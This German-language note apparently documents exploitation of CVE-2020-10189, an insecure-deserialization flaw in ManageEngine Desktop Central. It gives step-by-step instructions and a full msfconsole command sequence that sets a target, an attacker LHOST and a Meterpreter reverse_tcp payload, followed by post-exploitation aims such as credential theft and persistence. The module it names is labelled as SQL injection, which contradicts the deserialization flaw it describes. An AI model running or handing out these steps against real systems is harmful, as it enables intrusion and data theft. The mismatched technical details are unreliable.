Manager Central Schwachstelle
Details zur Schwachstelle: ManageEngine Desktop Central (CVE-2020-10189)
Schwachstelle: Die Schwachstelle in ManageEngine Desktop Central (z. B. CVE-2020-10189) ermöglicht eine Remote Code Execution (RCE) durch unsichere Deserialisierung von Daten in ungepatchten Versionen. Dies ermöglicht es einem Angreifer, beliebigen Code auf dem Server auszuführen.
Angriffspunkt: Die Schwachstelle befindet sich in der Verwaltungsschnittstelle von Desktop Central, die standardmäßig auf einem Webserver läuft. Angreifer können speziell gestaltete HTTP-Anfragen an den Server senden, um unsichere Deserialisierung auszulösen und bösartigen Code auszuführen.
Ausnutzung: Ein Angreifer kann ein speziell entwickeltes Exploit-Tool (z. B. Metasploit-Modul) verwenden, um die Schwachstelle auszunutzen und eine Remoteshell zu erhalten. Der Exploit nutzt unsichere Deserialisierungspraktiken im Servercode aus, um die Kontrolle zu erlangen.
Schritte zur Ausnutzung
- Überprüfe die Version von ManageEngine Desktop Central, um festzustellen, ob sie anfällig ist.
- Verwende Metasploit, um den passenden Exploit zu finden, der die Schwachstelle ausnutzt.
- Konfiguriere den Exploit mit der Ziel-IP-Adresse (RHOSTS), deiner IP-Adresse (LHOST), und setze den Payload (z. B. `java/meterpreter/reverse_tcp`).
- Starte den Exploit. Wenn der Exploit erfolgreich ist, erhält der Angreifer eine Meterpreter-Sitzung und damit vollen Zugriff auf das System.
Warum ist diese Schwachstelle gefährlich?
- Remote Code Execution (RCE): Ermöglicht es einem Angreifer, beliebige Befehle auf dem Server auszuführen, was zur vollständigen Kompromittierung des Systems führen kann.
- Ungepatchte Systeme: Viele Organisationen haben es möglicherweise versäumt, ihre Systeme zu aktualisieren, was sie anfällig macht.
- Weitreichende Auswirkungen: Ein erfolgreicher Angriff kann nicht nur das kompromittierte System gefährden, sondern auch dazu verwendet werden, sich lateral im Netzwerk zu bewegen und andere Systeme zu infizieren.
- Einfacher Zugang: Wenn der Webserver öffentlich zugänglich ist und keine Sicherheitsmaßnahmen wie Firewalls oder zusätzliche Authentifizierungen vorhanden sind, kann der Angriff sehr einfach durchgeführt werden.
Beispiel für Metasploit-Konfiguration
Um die Schwachstelle auszunutzen, kann folgendes Metasploit-Modul verwendet werden:
msf6 > use exploit/windows/http/manageengine_dc_pmp_sqli_rce
msf6 exploit(windows/http/manageengine_dc_pmp_sqli_rce) > set RHOSTS 10.0.10.107
msf6 exploit(windows/http/manageengine_dc_pmp_sqli_rce) > set RPORT 8022
msf6 exploit(windows/http/manageengine_dc_pmp_sqli_rce) > set LHOST <deine_IP>
msf6 exploit(windows/http/manageengine_dc_pmp_sqli_rce) > set LPORT 4444
msf6 exploit(windows/http/manageengine_dc_pmp_sqli_rce) > run
Nach erfolgreichem Exploit erhält der Angreifer eine Meterpreter-Sitzung und kann weitergehende Post-Exploitation-Schritte durchführen, wie das Sammeln von Anmeldeinformationen, Dateisystemmanipulationen und das Einrichten von Persistenz.